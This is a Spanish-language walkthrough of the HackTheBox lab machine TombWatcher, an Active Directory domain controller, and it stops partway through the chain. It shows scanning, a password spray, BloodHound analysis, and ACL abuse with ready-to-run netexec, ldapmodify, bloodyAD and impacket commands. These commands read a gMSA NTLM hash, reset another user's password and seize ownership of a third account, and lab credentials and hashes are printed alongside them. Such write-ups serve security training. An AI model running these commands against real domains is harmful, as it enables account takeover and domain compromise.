TombWatcher HackTheBox (Intermediate)
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-10 07:02 EDT
Nmap scan report for 10.10.11.72
Host is up (0.032s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-10 15:02:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-10T15:04:02+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-10T14:24:24
|_Not valid after: 2026-10-10T14:24:24
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-10T15:04:01+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-10T14:24:24
|_Not valid after: 2026-10-10T14:24:24
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-10T14:24:24
|_Not valid after: 2026-10-10T14:24:24
|_ssl-date: 2025-10-10T15:04:02+00:00; +4h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-10T14:24:24
|_Not valid after: 2026-10-10T14:24:24
|_ssl-date: 2025-10-10T15:04:01+00:00; +4h00m01s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49540/tcp open msrpc Microsoft Windows RPC
49574/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49686/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49687/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4h00m00s, deviation: 0s, median: 4h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-10T15:03:22
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.44 secondsVeremos varios puertos interesantes, entre ellos el puerto 80 que aloja una pagina web, vamos a entrar dentro de la misma a ver que nos encontramos, pero antes como vemos en el reporte nos veremos un dominio de AD llamado tombwatcher.htb y DC01.tombwatcher.htb del Domain Controller por lo que vamos añadirlo a nuestro archivo hosts.
nano /etc/hosts
#Dentro del nano
<IP> tombwatcher.htb DC01.tombwatcher.htbLo guardamos y entramos en la pagina de esta forma:
URL = http://<IP>/Veremos un IIS normal de web nada interesante, vamos a realizar un fuzzing por SMB y en concreto vamos a utilizar las credenciales que nos proporcionan en HTB:
Veremos que son:
User: henry
Pass: H3nry_987TGV!SMB
Vamos a probar a enumerar el puerto SMB a ver que vemos con dichas credenciales:
enum4linux -a -u henry -p 'H3nry_987TGV!' <IP>Info:
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Oct 10 07:10:09 2025
=========================================( Target Information )=========================================
Target ........... 10.10.11.72
RID Range ........ 500-550,1000-1050
Username ......... 'henry'
Password ......... 'H3nry_987TGV!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.11.72 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.11.72 )================================
Looking up status of 10.10.11.72
No reply from 10.10.11.72
====================================( Session Check on 10.10.11.72 )====================================
[+] Server 10.10.11.72 allows sessions using username 'henry', password 'H3nry_987TGV!'
=================================( Getting domain SID for 10.10.11.72 )=================================
Domain Name: TOMBWATCHER
Domain Sid: S-1-5-21-1392491010-1358638721-2126982587
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.11.72 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.11.72 from srvinfo:
10.10.11.72 Wk Sv PDC Tim NT
platform_id : 500
os version : 10.0
server type : 0x80102b
========================================( Users on 10.10.11.72 )========================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfaf RID: 0x450 acb: 0x00000210 Account: Alfred Name: (null) Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfae RID: 0x44f acb: 0x00000210 Account: Henry Name: (null) Desc: (null)
index: 0xfb1 RID: 0x452 acb: 0x00000210 Account: john Name: (null) Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfb0 RID: 0x451 acb: 0x00000210 Account: sam Name: (null) Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[Henry] rid:[0x44f]
user:[Alfred] rid:[0x450]
user:[sam] rid:[0x451]
user:[john] rid:[0x452]
==================================( Share Enumeration on 10.10.11.72 )==================================
do_connect: Connection to 10.10.11.72 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.11.72
//10.10.11.72/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.11.72/C$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_NO_SUCH_FILE listing \*
//10.10.11.72/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//10.10.11.72/NETLOGON Mapping: OK Listing: OK Writing: N/A
//10.10.11.72/SYSVOL Mapping: OK Listing: OK Writing: N/A
============================( Password Policy Information for 10.10.11.72 )============================
[+] Attaching to 10.10.11.72 using henry:H3nry_987TGV!
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.11.72)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] TOMBWATCHER
[+] Builtin
[+] Password Info for Domain: TOMBWATCHER
[+] Minimum password length: 1
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 1
=======================================( Groups on 10.10.11.72 )=======================================
[+] Getting builtin groups:
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group: Administrators' (RID: 544) has member: TOMBWATCHER\Administrator
Group: Administrators' (RID: 544) has member: TOMBWATCHER\Enterprise Admins
Group: Administrators' (RID: 544) has member: TOMBWATCHER\Domain Admins
Group: Users' (RID: 545) has member: TOMBWATCHER\Administrator
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: TOMBWATCHER\Domain Users
Group: Remote Management Users' (RID: 580) has member: TOMBWATCHER\john
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: TOMBWATCHER\DC01$
Group: Certificate Service DCOM Access' (RID: 574) has member: NT AUTHORITY\Authenticated Users
Group: Guests' (RID: 546) has member: TOMBWATCHER\Guest
Group: Guests' (RID: 546) has member: TOMBWATCHER\Domain Guests
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: Cert Publishers' (RID: 517) has member: TOMBWATCHER\DC01$
Group: Denied RODC Password Replication Group' (RID: 572) has member: Could not initialise pipe samr. Error was NT_STATUS_INVALID_NETWORK_RESPONSE
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Infrastructure] rid:[0x453]
[+] Getting domain group memberships:
Group: 'Schema Admins' (RID: 518) has member: TOMBWATCHER\Administrator
Group: 'Domain Guests' (RID: 514) has member: TOMBWATCHER\Guest
Group: 'Domain Admins' (RID: 512) has member: TOMBWATCHER\Administrator
Group: 'Domain Users' (RID: 513) has member: TOMBWATCHER\Administrator
Group: 'Domain Users' (RID: 513) has member: TOMBWATCHER\krbtgt
Group: 'Domain Users' (RID: 513) has member: TOMBWATCHER\Henry
Group: 'Domain Users' (RID: 513) has member: TOMBWATCHER\Alfred
Group: 'Domain Users' (RID: 513) has member: TOMBWATCHER\sam
Group: 'Domain Users' (RID: 513) has member: TOMBWATCHER\john
Group: 'Enterprise Admins' (RID: 519) has member: TOMBWATCHER\Administrator
Group: 'Domain Controllers' (RID: 516) has member: TOMBWATCHER\DC01$
Group: 'Domain Computers' (RID: 515) has member: TOMBWATCHER\ansible_dev$
Group: 'Group Policy Creator Owners' (RID: 520) has member: TOMBWATCHER\Administrator
===================( Users on 10.10.11.72 via RID cycling (RIDS: 500-550,1000-1050) )===================
[I] Found new SID:
S-1-5-21-1392491010-1358638721-2126982587
[I] Found new SID:
S-1-5-21-1392491010-1358638721-2126982587
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-1392491010-1358638721-2126982587 and logon username 'henry', password 'H3nry_987TGV!'
S-1-5-21-1392491010-1358638721-2126982587-500 TOMBWATCHER\Administrator (Local User)
S-1-5-21-1392491010-1358638721-2126982587-501 TOMBWATCHER\Guest (Local User)
S-1-5-21-1392491010-1358638721-2126982587-502 TOMBWATCHER\krbtgt (Local User)
S-1-5-21-1392491010-1358638721-2126982587-512 TOMBWATCHER\Domain Admins (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-513 TOMBWATCHER\Domain Users (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-514 TOMBWATCHER\Domain Guests (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-515 TOMBWATCHER\Domain Computers (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-516 TOMBWATCHER\Domain Controllers (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-517 TOMBWATCHER\Cert Publishers (Local Group)
S-1-5-21-1392491010-1358638721-2126982587-518 TOMBWATCHER\Schema Admins (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-519 TOMBWATCHER\Enterprise Admins (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-520 TOMBWATCHER\Group Policy Creator Owners (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-521 TOMBWATCHER\Read-only Domain Controllers (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-522 TOMBWATCHER\Cloneable Domain Controllers (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-525 TOMBWATCHER\Protected Users (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-526 TOMBWATCHER\Key Admins (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-527 TOMBWATCHER\Enterprise Key Admins (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-1000 TOMBWATCHER\DC01$ (Local User)
[+] Enumerating users using SID S-1-5-90 and logon username 'henry', password 'H3nry_987TGV!'
[+] Enumerating users using SID S-1-5-21-2729675972-3892313149-4080990915 and logon username 'henry', password 'H3nry_987TGV!'
S-1-5-21-2729675972-3892313149-4080990915-500 DC01\Administrator (Local User)
S-1-5-21-2729675972-3892313149-4080990915-501 DC01\Guest (Local User)
S-1-5-21-2729675972-3892313149-4080990915-503 DC01\DefaultAccount (Local User)
S-1-5-21-2729675972-3892313149-4080990915-504 DC01\WDAGUtilityAccount (Local User)
S-1-5-21-2729675972-3892313149-4080990915-513 DC01\None (Domain Group)
[+] Enumerating users using SID S-1-5-32 and logon username 'henry', password 'H3nry_987TGV!'
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'henry', password 'H3nry_987TGV!'
[+] Enumerating users using SID S-1-5-82-3006700770-424185619-1745488364-794895919 and logon username 'henry', password 'H3nry_987TGV!'
[+] Enumerating users using SID S-1-5-82-3876422241-1344743610-1729199087-774402673 and logon username 'henry', password 'H3nry_987TGV!'
[+] Enumerating users using SID S-1-5-80 and logon username 'henry', password 'H3nry_987TGV!'
[+] Enumerating users using SID S-1-5-82-271721585-897601226-2024613209-625570482 and logon username 'henry', password 'H3nry_987TGV!'
================================( Getting printer info for 10.10.11.72 )================================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_OBJECT_NAME_NOT_FOUND
enum4linux complete on Fri Oct 10 07:19:13 2025Veremos informacion muy interesante entre ella veremos varios usuarios:
users.txt
alfred
Alfred
sam
john
DC01Veremos que john puede conectarse por WinRM es una opcion interesante, despues vemos que DC01 puede publicar certificados y por ultimo vemos un grupo llamado DnsAdmins que esto puede tener una vulnerabilidad conocida.
Netexec
Vamos a probar fuerza bruta por SMB con netexec con el listado de usuarios a ver si hay suerte.
netexec smb <IP> -u users.txt -p <WORDLIST> --ignore-pw-decodingInfo:
.................................<RESTO DE INFO>...................................
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\alfred:basketballVeremos que hemos encontrado unas credenciales del usuario alfred vamos a ver que podemos hacer con este usuario.
BloodHound
Vamos a descargarnos en un ZIP toda la info del AD con esta herramienta para pasarsela a BloodHound de esta forma:
bloodhound-python -u henry -p 'H3nry_987TGV!' -ns <IP> -d TOMBWATCHER.htb -c All --zipInfo:
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 08S
INFO: Compressing output into 20251010075810_bloodhound.zipCon esto veremos un .zip el cual contiene toda la info para pasarsela a BloodHound vamos a instalarnos dicha herramienta.
URL = Download BloodHound en Docker
wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz
tar -xvzf bloodhound-cli-linux-amd64.tar.gz
./bloodhound-cli installInfo:
..............................<RESTO DE INFO>......................................
Container bloodhound-graph-db-1 Creating
Container bloodhound-app-db-1 Creating
Container bloodhound-graph-db-1 Created
Container bloodhound-app-db-1 Created
Container bloodhound-bloodhound-1 Creating
Container bloodhound-bloodhound-1 Created
Container bloodhound-app-db-1 Starting
Container bloodhound-graph-db-1 Starting
Container bloodhound-app-db-1 Started
Container bloodhound-graph-db-1 Started
Container bloodhound-graph-db-1 Waiting
Container bloodhound-app-db-1 Waiting
Container bloodhound-graph-db-1 Healthy
Container bloodhound-app-db-1 Healthy
Container bloodhound-bloodhound-1 Starting
Container bloodhound-bloodhound-1 Started
[+] BloodHound is ready to go!
[+] You can log in as `admin` with this password: bnf8XsztC4Hypx6nMV5eSlhHpuDfEWgH
[+] You can get your admin password by running: bloodhound-cli config get default_password
[+] You can access the BloodHound UI at: http://127.0.0.1:8080/ui/loginAhora que esta importado en nuestro docker y levantado podremos acceder a el desde la siguiente URL.
URL = http://127.0.0.1:8080/ui/loginNos logueamos con las credenciales propocionadas por la herramienta:
User: admin
Pass: bnf8XsztC4Hypx6nMV5eSlhHpuDfEWgHUna vez dentro vamos a importar el .zip y tendremos que esperar un poco a que cargue todos los datos, despues cuando vayamos al dashboard principal veremos todos los datos, vamos a investigar el usuario henry que puede tener con el usuario alfred, investigando un poco veremos lo siguiente:
Veremos que tenemos los privilegios de WriteSPN sobre el usuario alfred por lo que podremos descargarnos un script ya configurado para ello y poder realizar la vulnerabilidad de esta forma:
NOTA
Pero antes si queremos que se pare el contenedor o lo quisieramos levantar de nuevo, podemos hacer lo siguiente con el binario:
./bloodhound-cli down # Para parar el contenedor
./bloodhound-cli up # Para levantar de nuevo el contendorAhora siguiendo con la explotacion de dicha vulnerabilidad...
URL = Download addspn.py
git clone https://github.com/dirkjanm/krbrelayx.git
cd krbrelayx/
python3 addspn.py -u 'TOMBWATCHER.htb\henry' -p 'H3nry_987TGV!' -t 'alfred' -s 'http/alfred.tombwatcher.htb' <IP>Info:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfullyVeremos que ha funcionado, ahora si lo comprobamos de esta forma:
python3 addspn.py -u 'TOMBWATCHER.htb\henry' -p 'H3nry_987TGV!' -t 'alfred' -q <IP>Info:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=Alfred,CN=Users,DC=tombwatcher,DC=htb - STATUS: Read - READ TIME: 2025-10-10T15:31:46.511872
sAMAccountName: Alfred
servicePrincipalName: http/alfred.tombwatcher.htbVeremos que se agrego de forma correcta, pero de momento no podremos hacer nada, por lo que vamos a seguir investigando en el BloodHound pero esta vez nos vamos a descargar con las credenciales del usuario alfred.
bloodhound-python -u alfred -p 'basketball' -ns <IP> -d TOMBWATCHER.htb -c All --zipInfo:
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 07S
INFO: Compressing output into 20251011041041_bloodhound.zipAhora importaremos en BloodHound este nuevo archivo, investigando un poco veremos con el usuario alfred este privilegio.
Escalate user john
Veremos que tenemos privilegios de AddSelf con el grupo Infrastructure y este grupo a la vez tiene este privilegio:
Y ala vez Ansible_devs$ tiene los privilegios siguientes respecto al usuario sam:
Vemos que podremos cambiarle la contraseña desde dicho "Equipo", tambien con este usuario veremos los privilegios bajo el usuario john.
Vemos que tenemos el WriteOwner sobre el usuario john que es el que sabemos que se puede conectar por WinRM, por lo que toda esta escalada nos interesa bastante.
Ya por ultimo con este usuario john veremos estos privilegios super interesante respecto a los ADCS:
Teniendo ya practicamente toda la escalada vista por encima vamos a ponerlo en practica de esta forma, empecemos primero con el privilegios de AddSelf.
cat > add_to_infra.ldif << EOF
dn: CN=Infrastructure,CN=Users,DC=tombwatcher,DC=htb
changetype: modify
add: member
member: CN=Alfred,CN=Users,DC=tombwatcher,DC=htb
EOF
ldapmodify -x -H ldap://<IP> -D 'alfred@TOMBWATCHER.htb' -w 'basketball' -f add_to_infra.ldifInfo:
modifying entry "CN=Infrastructure,CN=Users,DC=tombwatcher,DC=htb"Veremos que ha funcionado, ahora vamos a comprobar si realmente se agrego a dicho grupo alfred:
ldapsearch -x -H ldap://<IP> -D 'alfred@TOMBWATCHER.htb' -w 'basketball' -b "CN=Infrastructure,CN=Users,DC=tombwatcher,DC=htb" memberInfo:
# extended LDIF
#
# LDAPv3
# base <CN=Infrastructure,CN=Users,DC=tombwatcher,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: member
#
# Infrastructure, Users, tombwatcher.htb
dn: CN=Infrastructure,CN=Users,DC=tombwatcher,DC=htb
member: CN=Alfred,CN=Users,DC=tombwatcher,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1Veremos que si se agrego de forma correcta, ahora siendo de ese grupo recordemos que podemos leer el hash NTLM de dicho usuario.
Vamos a descargarnos un script el cual nos automatiza todo esto:
URL = Download bloodyAD
git clone https://github.com/CravateRouge/bloodyAD
cd bloodyAD/
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
python3 bloodyAD.py -d TOMBWATCHER.htb -u alfred -p basketball --host <IP> get object 'ANSIBLE_DEV$' --attr msDS-ManagedPasswordInfo:
distinguishedName: CN=ansible_dev,CN=Managed Service Accounts,DC=tombwatcher,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:bf8b11e301f7ba3fdc616e5d4fa01c30
msDS-ManagedPassword.B64ENCODED: hTHfon3m4u5bkUTSlOKiTcVGqaIiYqe4SrrDZd8uUEmyGMin8X1qKy6L5ZHVlsvRp17h6l5hC0OqLxYV/WGcmmGom+hqBklNY+MSgPO2r8SUnGniBbV3VR2C6pak3TJxRHd+4yb8iNDsLLgEG/goJ8yVoaaYpQppZWEOtE9EvQLV0nYjWoReut1xHZ1QP/kmHL6hOGrASDo2FIgXRQmEzjyatED/Zdz7s3mfB3OuOWxQUiyd4tic2RFKHEjurhJXN8iuVh0jPJzyWqEiF+5+ZYDckA52ICoIN9JhyAxH3R6Ftqjok3Xc524zjHBiE3Fb7ZMBtNkjobLCxW3976E1yw==Veremos que ha funcionado, obtenemos el hash NTLM del usuario ANSIBLE_DEV$, vamos a comprobarlo de esta forma:
netexec smb <IP> -u 'ANSIBLE_DEV$' -H 'bf8b11e301f7ba3fdc616e5d4fa01c30' --sharesInfo:
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\ANSIBLE_DEV$:bf8b11e301f7ba3fdc616e5d4fa01c30
SMB 10.10.11.72 445 DC01 [*] Enumerated shares
SMB 10.10.11.72 445 DC01 Share Permissions Remark
SMB 10.10.11.72 445 DC01 ----- ----------- ------
SMB 10.10.11.72 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.72 445 DC01 C$ Default share
SMB 10.10.11.72 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.72 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.72 445 DC01 SYSVOL READ Logon server shareVeremos que funciona, ahora que con este usuario recordemos que tenemos los privilegios para cambiar la contraseña al usuario sam, podremos realizar lo siguiente:
python3 bloodyAD.py --host '<IP>' -d 'tombwatcher.htb' -u 'ansible_dev$' -p ':bf8b11e301f7ba3fdc616e5d4fa01c30' set password SAM 'P@ssw0rd123!'Info:
[+] Password changed successfully!Veremos que ha funcionado, por lo que vamos a probar las credenciales de esta forma:
netexec smb <IP> -u 'sam' -p 'P@ssw0rd123!' --sharesInfo:
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\sam:P@ssw0rd123!
SMB 10.10.11.72 445 DC01 [*] Enumerated shares
SMB 10.10.11.72 445 DC01 Share Permissions Remark
SMB 10.10.11.72 445 DC01 ----- ----------- ------
SMB 10.10.11.72 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.72 445 DC01 C$ Default share
SMB 10.10.11.72 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.72 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.72 445 DC01 SYSVOL READ Logon server shareVeremos que funciona, recordemos que tenemos WriteOwner sobre el usuario john que es el que se puede conectar por WinRM de forma remota, por lo que vamos aprovechar esto:
Vamos añadirnos todos los permisos con el usuario sam al objeto de usuario john de esta forma:
OwnerEdit
impacket-owneredit -dc-ip <IP> -action write -new-owner sam -target john tombwatcher.htb/sam:P@ssw0rd123!Info:
/home/kali/Desktop/tombwatcher/bloodyAD/.venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-1392491010-1358638721-2126982587-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=tombwatcher,DC=htb
[*] OwnerSid modified successfully!DACLEdit
impacket-dacledit -dc-ip <IP> -action write -rights FullControl -principal sam -target john tombwatcher/sam:P@ssw0rd123!Info:
/home/kali/Desktop/tombwatcher/bloodyAD/.venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20251012-073940.bak
[*] DACL modified successfully!Ahora si echo todo lo anterior, ya podremos cambiarle la contraseña a john ya que tenemos los privilegios adecuados que nos hemos añadido.
